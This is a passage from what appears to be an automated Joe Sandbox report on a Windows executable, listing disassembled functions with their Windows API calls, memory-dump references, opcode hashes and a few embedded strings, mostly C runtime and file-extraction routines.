                        • Associated: 00000000.00000002.2176642907.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176642907.00000000001B7000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176676802.00000000001CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_170000_w4XFffGDz1.jbxd
                        Similarity
                        • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                        • String ID:
                        • API String ID: 336800556-0
                        • Opcode ID: fc8dc00c49c6369057b7bc1a9a1ce465e84fbeeb74ce1c9e507461be6c8bb4d1
                        • Instruction ID: 142c08b39c086fc9b7ec85bd2f3e9a64a19f2b614d95eb9a83990e35b3bbb410
                        • Opcode Fuzzy Hash: fc8dc00c49c6369057b7bc1a9a1ce465e84fbeeb74ce1c9e507461be6c8bb4d1
                        • Instruction Fuzzy Hash: EF0184726422157F6B212A7E5C8DC7F6A6DEEC6BA1755012DF905C2280EB608D4281B0
                        APIs
                        • GetLastError.KERNEL32(0018C17E,0018C17E,?,00196938,00196BB1,?,?,0018D656,?,?,?,00000000,?,0018C08A,0018C17E,?), ref: 001967EE
                        • _free.LIBCMT ref: 00196823
                        • _free.LIBCMT ref: 0019684A
                        • SetLastError.KERNEL32(00000000,?,0018C17E), ref: 00196857
                        • SetLastError.KERNEL32(00000000,?,0018C17E), ref: 00196860
                        Memory Dump Source
                        • Source File: 00000000.00000002.2176597112.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                        • Associated: 00000000.00000002.2176581837.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176624855.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176642907.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176642907.00000000001B7000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176676802.00000000001CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_170000_w4XFffGDz1.jbxd
                        Similarity
                        • API ID: ErrorLast$_free
                        • String ID:
                        • API String ID: 3170660625-0
                        • Opcode ID: 5c1e3d8a7cf10694e70332cdaf1be07f203cd0e6e825108f72d5ccbdac52fddc
                        • Instruction ID: e4ae73d78e8f1f92eade8f89ab0b2e9a44da27a4c9724932e792712b695e4052
                        • Opcode Fuzzy Hash: 5c1e3d8a7cf10694e70332cdaf1be07f203cd0e6e825108f72d5ccbdac52fddc
                        • Instruction Fuzzy Hash: F401C8322457002BDE1667785D95D2B265DDBE33B57210039F916E39A2FF74CC45C570
                        APIs
                        • _free.LIBCMT ref: 00199BB7
                          • Part of subcall function 00196B34: RtlFreeHeap.NTDLL(00000000,00000000,?,00199C36,?,00000000,?,00000000,?,00199C5D,?,00000007,?,?,0019A05A,?), ref: 00196B4A
                          • Part of subcall function 00196B34: GetLastError.KERNEL32(?,?,00199C36,?,00000000,?,00000000,?,00199C5D,?,00000007,?,?,0019A05A,?,?), ref: 00196B5C
                        • _free.LIBCMT ref: 00199BC9
                        • _free.LIBCMT ref: 00199BDB
                        • _free.LIBCMT ref: 00199BED
                        • _free.LIBCMT ref: 00199BFF
                        Memory Dump Source
                        • Source File: 00000000.00000002.2176597112.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                        • Associated: 00000000.00000002.2176581837.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176624855.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176642907.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176642907.00000000001B7000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176676802.00000000001CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_170000_w4XFffGDz1.jbxd
                        Similarity
                        • API ID: _free$ErrorFreeHeapLast
                        • String ID:
                        • API String ID: 776569668-0
                        • Opcode ID: ae9fc77e37b6d12c6e05e3aab1da32f70224fcc8354cfe8000ac9b5442e09576
                        • Instruction ID: c2f171ba6307935d20b5651aab6efa4cb3eaff9440123deec94a96fb5de1a54c
                        • Opcode Fuzzy Hash: ae9fc77e37b6d12c6e05e3aab1da32f70224fcc8354cfe8000ac9b5442e09576
                        • Instruction Fuzzy Hash: AFF03A32706200ABCE20EB6CF9C6C1A77E9BB017107690809F80AD7940EB74FCC0CA74
                        APIs
                        • _free.LIBCMT ref: 00195EFE
                          • Part of subcall function 00196B34: RtlFreeHeap.NTDLL(00000000,00000000,?,00199C36,?,00000000,?,00000000,?,00199C5D,?,00000007,?,?,0019A05A,?), ref: 00196B4A
                          • Part of subcall function 00196B34: GetLastError.KERNEL32(?,?,00199C36,?,00000000,?,00000000,?,00199C5D,?,00000007,?,?,0019A05A,?,?), ref: 00196B5C
                        • _free.LIBCMT ref: 00195F10
                        • _free.LIBCMT ref: 00195F23
                        • _free.LIBCMT ref: 00195F34
                        • _free.LIBCMT ref: 00195F45
                        Memory Dump Source
                        • Source File: 00000000.00000002.2176597112.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                        • Associated: 00000000.00000002.2176581837.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176624855.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176642907.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176642907.00000000001B7000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176676802.00000000001CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_170000_w4XFffGDz1.jbxd
                        Similarity
                        • API ID: _free$ErrorFreeHeapLast
                        • String ID:
                        • API String ID: 776569668-0
                        • Opcode ID: 0abfe1b55b74a4fa46f8a556f7061661be2e703731f55f8a06067ace078e9522
                        • Instruction ID: 0837763d13491cda613e7e2af3a58688ee786aca4ddd3fe008c6f7636152f4bb
                        • Opcode Fuzzy Hash: 0abfe1b55b74a4fa46f8a556f7061661be2e703731f55f8a06067ace078e9522
                        • Instruction Fuzzy Hash: 40F05471A0A1109B8F116F34BC93C153FA5F729721B05050AF841D7B70E73188D1CFA5
                        APIs
                        • _wcslen.LIBCMT ref: 0018A104
                          • Part of subcall function 001714A3: _wcslen.LIBCMT ref: 001714B4
                        • __EH_prolog3_GS.LIBCMT ref: 0018A452
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2176597112.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                        • Associated: 00000000.00000002.2176581837.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176624855.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176642907.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176642907.00000000001B7000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176676802.00000000001CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_170000_w4XFffGDz1.jbxd
                        Similarity
                        • API ID: _wcslen$H_prolog3_
                        • String ID: .lnk$0$lnk
                        • API String ID: 2000020936-906397761
                        • Opcode ID: 7ab5f8f6e8b6a02ac934d25b125c6867694d5ff21e359ed36566b267a2d0f9d5
                        • Instruction ID: ae9c8cc3451e4a87acc8838d557d5d76831aaaa8dcb151a6dd9b5b15e5dc512d
                        • Opcode Fuzzy Hash: 7ab5f8f6e8b6a02ac934d25b125c6867694d5ff21e359ed36566b267a2d0f9d5
                        • Instruction Fuzzy Hash: 59E12A71D002589FDB28EBA4CC85BEDB7B8BF19300F5441AAE509B7251DB749B88CF61
                        APIs
                        • GetTempPathW.KERNEL32(00000105,00000000,00000000,0000020A), ref: 00189AC6
                          • Part of subcall function 001714A3: _wcslen.LIBCMT ref: 001714B4
                          • Part of subcall function 0017559C: _wcslen.LIBCMT ref: 001755AC
                        • EndDialog.USER32(?,00000001), ref: 00189E3A
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2176597112.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                        • Associated: 00000000.00000002.2176581837.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176624855.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176642907.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176642907.00000000001B7000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176676802.00000000001CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_170000_w4XFffGDz1.jbxd
                        Similarity
                        • API ID: _wcslen$DialogPathTemp
                        • String ID: $@set:user
                        • API String ID: 2172748170-1503366402
                        • Opcode ID: fa512f38fbaccb2c721fea8fa3ad5e71f5f4b963de22c2049dfb038029d8ef97
                        • Instruction ID: 6bcd9a397c88cbab66a80dd5b0887b8556e5be3debcfda2ab12f45780b1f4ce1
                        • Opcode Fuzzy Hash: fa512f38fbaccb2c721fea8fa3ad5e71f5f4b963de22c2049dfb038029d8ef97
                        • Instruction Fuzzy Hash: ABC14A7180025C9FDF25EBA4CD45BEDBBB8AF25304F44409AE849B7292DB705B89CF61
                        APIs
                          • Part of subcall function 00175D94: __EH_prolog3.LIBCMT ref: 00175D9B
                          • Part of subcall function 00175D94: GetCurrentDirectoryW.KERNEL32(00000000,00000000,0000000C,00176209,?,000000FF,\\?\,B19080A7,?,000000FF,?,?,0019FF80,000000FF), ref: 00175DA4
                          • Part of subcall function 00176449: __EH_prolog3_GS.LIBCMT ref: 00176450
                          • Part of subcall function 00174CC7: __EH_prolog3_GS.LIBCMT ref: 00174CCE
                          • Part of subcall function 00174A2F: __EH_prolog3_GS.LIBCMT ref: 00174A36
                          • Part of subcall function 00174A2F: SetFileAttributesW.KERNELBASE(?,00000000,00000024,00174830,?,?,?,?,?,?,00000024,001742E9,?,00000001,00000000,?), ref: 00174A4C
                          • Part of subcall function 00174A2F: SetFileAttributesW.KERNEL32(?,00000000,?,?,?,?,?,?,?,00000024), ref: 00174A8F
                        • SHFileOperationW.SHELL32(?,00000000,?,?,?,00000000), ref: 00189097
                        • MoveFileW.KERNEL32(?,?), ref: 0018921E
                        • MoveFileExW.KERNEL32(?,00000000,00000004), ref: 00189238
                          • Part of subcall function 00175F86: __EH_prolog3_GS.LIBCMT ref: 00175F8D
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2176597112.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                        • Associated: 00000000.00000002.2176581837.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176624855.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176642907.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176642907.00000000001B7000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176676802.00000000001CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_170000_w4XFffGDz1.jbxd
                        Similarity
                        • API ID: File$H_prolog3_$AttributesMove$CurrentDirectoryH_prolog3Operation
                        • String ID: .tmp
                        • API String ID: 1688541384-2986845003
                        • Opcode ID: 46337631a9cc3c9b16b656994d279176f492983d35e89c37873e79cae1450103
                        • Instruction ID: 02644ff15dd4b23a740b6e3862eae96a9e8025478305448ca5aa0a6d72686ed1
                        • Opcode Fuzzy Hash: 46337631a9cc3c9b16b656994d279176f492983d35e89c37873e79cae1450103
                        • Instruction Fuzzy Hash: E3C1C071C002689ADB25EBA4CC85BEDB7B9BF19300F5481EAE44DA3251DB345B89CF61
                        APIs
                        • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\w4XFffGDz1.exe,00000104), ref: 00195582
                        • _free.LIBCMT ref: 0019564D
                        • _free.LIBCMT ref: 00195657
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2176597112.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                        • Associated: 00000000.00000002.2176581837.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176624855.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176642907.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176642907.00000000001B7000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176676802.00000000001CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_170000_w4XFffGDz1.jbxd
                        Similarity
                        • API ID: _free$FileModuleName
                        • String ID: C:\Users\user\Desktop\w4XFffGDz1.exe
                        • API String ID: 2506810119-1933364742
                        • Opcode ID: 31bd189e1999a2dc66f519034e8ce2ca54c276e247a7ddfb948406b8cc8b6b3b
                        • Instruction ID: 4691d2c8fcd5ac90044247158f8a3ef16d75fbf3df59a683552382cc69381262
                        • Opcode Fuzzy Hash: 31bd189e1999a2dc66f519034e8ce2ca54c276e247a7ddfb948406b8cc8b6b3b
                        • Instruction Fuzzy Hash: CF3184B1A05608AFDF22DF99DC81DAEBBFDEF95710F54006AE404E7211D7708A41CB61
                        APIs
                        • EncodePointer.KERNEL32(00000000,?,00000000,1FFFFFFF), ref: 0019066E
                        • _abort.LIBCMT ref: 00190779
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2176597112.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                        • Associated: 00000000.00000002.2176581837.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176624855.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176642907.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176642907.00000000001B7000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176676802.00000000001CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_170000_w4XFffGDz1.jbxd
                        Similarity
                        • API ID: EncodePointer_abort
                        • String ID: MOC$RCC
                        • API String ID: 948111806-2084237596
                        • Opcode ID: 69de638800fdae5d474363c19d8722d37f4961e941a7aa1a512651bb389ae6c8
                        • Instruction ID: 915b0b667c03175d402dfdba8f78e7944d29888a689349f1343f8a71ac26de8c
                        • Opcode Fuzzy Hash: 69de638800fdae5d474363c19d8722d37f4961e941a7aa1a512651bb389ae6c8
                        • Instruction Fuzzy Hash: 1F415B71900209AFCF16DF98DD81AEEBBB5FF48310F148159FA08A7251D335AA61DF50
                        APIs
                        • __fprintf_l.LIBCMT ref: 001770C0
                        • _strncpy.LIBCMT ref: 0017710B
                          • Part of subcall function 0017BBC8: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00177BB8,?,00000000,00000000,?,?,?,00177BB8,?,?,00000050), ref: 0017BBE5
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2176597112.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                        • Associated: 00000000.00000002.2176581837.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176624855.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176642907.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176642907.00000000001B7000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176676802.00000000001CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_170000_w4XFffGDz1.jbxd
                        Similarity
                        • API ID: ByteCharMultiWide__fprintf_l_strncpy
                        • String ID: $%s$@%s
                        • API String ID: 562999700-834177443
                        • Opcode ID: 9ef5a1520a540c9035253747b64fe2f4692d61f86d1c1d2595f6746ecb29542a
                        • Instruction ID: 3fa2d5a5a8deacb6558fe02cdd50a7e3856fb9347a66bf21a4f1ad31db3efc1c
                        • Opcode Fuzzy Hash: 9ef5a1520a540c9035253747b64fe2f4692d61f86d1c1d2595f6746ecb29542a
                        • Instruction Fuzzy Hash: 10218D72A0430DABEB20DEA8CC42EBE77F8BF16310F444515FA18D7291E730EA158B61
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2176597112.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                        • Associated: 00000000.00000002.2176581837.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176624855.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176642907.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176642907.00000000001B7000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176676802.00000000001CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_170000_w4XFffGDz1.jbxd
                        Similarity
                        • API ID:
                        • String ID: RENAMEDLG$REPLACEFILEDLG
                        • API String ID: 0-56093855
                        • Opcode ID: 4cebb2ed2b7581b1537ebf2f727d449c4fb3a484ef7109e296625e8b14afecaf
                        • Instruction ID: bece587c4761dffb1a4a4876d540adb1e76d244f8ae9d4371fb7a38d2609ea05
                        • Opcode Fuzzy Hash: 4cebb2ed2b7581b1537ebf2f727d449c4fb3a484ef7109e296625e8b14afecaf
                        • Instruction Fuzzy Hash: 75115EB5204218ABD3229F14EC48E2EBFA5FF49359B84042AF54583A20D331DD95DF62
                        APIs
                        • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,00191033,00000000,?,001CB8E8,?,?,?,001911D6,00000004,InitializeCriticalSectionEx,001A5294,InitializeCriticalSectionEx), ref: 0019108F
                        • GetLastError.KERNEL32(?,00191033,00000000,?,001CB8E8,?,?,?,001911D6,00000004,InitializeCriticalSectionEx,001A5294,InitializeCriticalSectionEx,00000000,?,00190F8D), ref: 00191099
                        • LoadLibraryExW.KERNEL32(00000000,00000000,00000000), ref: 001910C1
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2176597112.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                        • Associated: 00000000.00000002.2176581837.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176624855.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176642907.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176642907.00000000001B7000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176676802.00000000001CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_170000_w4XFffGDz1.jbxd
                        Similarity
                        • API ID: LibraryLoad$ErrorLast
                        • String ID: api-ms-
                        • API String ID: 3177248105-2084034818
                        • Opcode ID: 24b70cf961da7eef3542c4c8e67c0255e3f8a8cc8163b02c60ed608eeb4e9d9c
                        • Instruction ID: ae174063e8aaf9c2b7fe74628a133981d4f73b983e6fc6f7ee650355d18eca85
                        • Opcode Fuzzy Hash: 24b70cf961da7eef3542c4c8e67c0255e3f8a8cc8163b02c60ed608eeb4e9d9c
                        • Instruction Fuzzy Hash: F3E08634684305B7EF201F60EC06B2D3F99AB12B90F144020FE0CF98E1D772DAD08984
                        APIs
                        Memory Dump Source
                        • Source File: 00000000.00000002.2176597112.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                        • Associated: 00000000.00000002.2176581837.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176624855.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176642907.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176642907.00000000001B7000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176676802.00000000001CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_170000_w4XFffGDz1.jbxd
                        Similarity
                        • API ID: __alldvrm$_strrchr
                        • String ID:
                        • API String ID: 1036877536-0
                        • Opcode ID: 8881f98e90fdfbbaba227011bdafa62b0478987616c577047395685bcd86fc10
                        • Instruction ID: 35e74c89ffe23ce006c6d17caa9c3aa8e182a8a62d2e382c0d75a8dcfdd07431
                        • Opcode Fuzzy Hash: 8881f98e90fdfbbaba227011bdafa62b0478987616c577047395685bcd86fc10
                        • Instruction Fuzzy Hash: 57A13772A283869FEF16CF58C8917AEBBE5EF65310F2841BDE4959B2C1D3348941C750
                        APIs
                        • MultiByteToWideChar.KERNEL32(?,00000000,54E85006,00191DA4,00000000,00000000,00192DD9,?,00192DD9,?,00000001,00191DA4,54E85006,00000001,00192DD9,00192DD9), ref: 00199D75
                        • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00199DFE
                        • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 00199E10
                        • __freea.LIBCMT ref: 00199E19
                          • Part of subcall function 00196B6E: RtlAllocateHeap.NTDLL(00000000,0018C17E,?,?,0018D656,?,?,?,00000000,?,0018C08A,0018C17E,?,?,?,?), ref: 00196BA0
                        Memory Dump Source
                        • Source File: 00000000.00000002.2176597112.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                        • Associated: 00000000.00000002.2176581837.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176624855.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176642907.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176642907.00000000001B7000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176676802.00000000001CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_170000_w4XFffGDz1.jbxd
                        Similarity
                        • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
                        • String ID:
                        • API String ID: 2652629310-0
                        • Opcode ID: 4e1e061a04c79b414f2f62ff71bdca09f196dd8b0d3f6ce757363d0d967eb084
                        • Instruction ID: 8e24c90b178feb4b9cc74ab543b230bc84298edc30af529f6672313ec1360948
                        • Opcode Fuzzy Hash: 4e1e061a04c79b414f2f62ff71bdca09f196dd8b0d3f6ce757363d0d967eb084
                        • Instruction Fuzzy Hash: 38319A72A0020AABDF25DFA8DC85DEE7BA5EB11710B05412CFC04D7290EB35DDA0CBA0
                        APIs
                        • __EH_prolog3.LIBCMT ref: 00179AE3
                        • ExpandEnvironmentStringsW.KERNEL32(?,00000000,00000000,?,?,?,?,?,00000010), ref: 00179AFA
                        • ExpandEnvironmentStringsW.KERNEL32(?,?,?,00000000,?,?,?,?,?,00000010), ref: 00179B37
                        • _wcslen.LIBCMT ref: 00179B47
                        Memory Dump Source
                        • Source File: 00000000.00000002.2176597112.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                        • Associated: 00000000.00000002.2176581837.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176624855.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176642907.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176642907.00000000001B7000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176676802.00000000001CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_170000_w4XFffGDz1.jbxd
                        Similarity
                        • API ID: EnvironmentExpandStrings$H_prolog3_wcslen
                        • String ID:
                        • API String ID: 3741103063-0
                        • Opcode ID: 4179566e0f1a487dc650eb3f34550dec0b2756e940c7cdade55901b80c6561d6
                        • Instruction ID: 9acb4a360ab66517bd6b8fb2b6172d69adb74869d3ebbd71a4ab54b7c09e45b2
                        • Opcode Fuzzy Hash: 4179566e0f1a487dc650eb3f34550dec0b2756e940c7cdade55901b80c6561d6
                        • Instruction Fuzzy Hash: 7B119A71A0121AAB8B04EFA89D95DBFB779EF55300B208119F415A7240CB30AE49CBB0
                        APIs
                        • __EH_prolog3.LIBCMT ref: 00175CFE
                          • Part of subcall function 00175032: GetVersionExW.KERNEL32(?), ref: 00175063
                        • FoldStringW.KERNEL32(00000020,?,000000FF,00000000,00000000,0000000C,0018419F,?,?,?), ref: 00175D25
                        • FoldStringW.KERNEL32(00000020,?,000000FF,?,00000008,00000000), ref: 00175D5F
                        • _wcslen.LIBCMT ref: 00175D6A
                        Memory Dump Source
                        • Source File: 00000000.00000002.2176597112.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                        • Associated: 00000000.00000002.2176581837.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176624855.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176642907.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176642907.00000000001B7000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176676802.00000000001CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_170000_w4XFffGDz1.jbxd
                        Similarity
                        • API ID: FoldString$H_prolog3Version_wcslen
                        • String ID:
                        • API String ID: 535866816-0
                        • Opcode ID: 4414e6b92e0ed26f76712b7004141cb22da0c6db28e6c19fcf04881a780869c9
                        • Instruction ID: a0535cca173bd3e0e66d693191ff34ebc9a63d9a0c1f4d977021327a388eb80c
                        • Opcode Fuzzy Hash: 4414e6b92e0ed26f76712b7004141cb22da0c6db28e6c19fcf04881a780869c9
                        • Instruction Fuzzy Hash: BB117371A11526ABDB10AFA8CD4997F7B7AAF55720F144209B418E72D1CB70A940C7F1
                        APIs
                        • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,00000000,00000000,?,0019807B,?,00000000,00000000,00000000,?,00198278,00000006,FlsSetValue), ref: 00198106
                        • GetLastError.KERNEL32(?,0019807B,?,00000000,00000000,00000000,?,00198278,00000006,FlsSetValue,001A6870,FlsSetValue,00000000,00000364,?,00196837), ref: 00198112
                        • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,0019807B,?,00000000,00000000,00000000,?,00198278,00000006,FlsSetValue,001A6870,FlsSetValue,00000000), ref: 00198120
                        Memory Dump Source
                        • Source File: 00000000.00000002.2176597112.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                        • Associated: 00000000.00000002.2176581837.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176624855.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176642907.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176642907.00000000001B7000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176676802.00000000001CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_170000_w4XFffGDz1.jbxd
                        Similarity
                        • API ID: LibraryLoad$ErrorLast
                        • String ID:
                        • API String ID: 3177248105-0
                        • Opcode ID: 9459bc16f28d51f062058b39a0c1981a852212a68071187c436f8c77ec04f003
                        • Instruction ID: 57d4909f7fde40e466586355a41545af4657ca9c26c2e5c514ec2e852a5cb75e
                        • Opcode Fuzzy Hash: 9459bc16f28d51f062058b39a0c1981a852212a68071187c436f8c77ec04f003
                        • Instruction Fuzzy Hash: EF01A232615226AFCB254B7CDC44E667B98AF07BA1B260631FA06E7540DB30D842C6E0
                        APIs
                        • __EH_prolog3.LIBCMT ref: 00175D9B
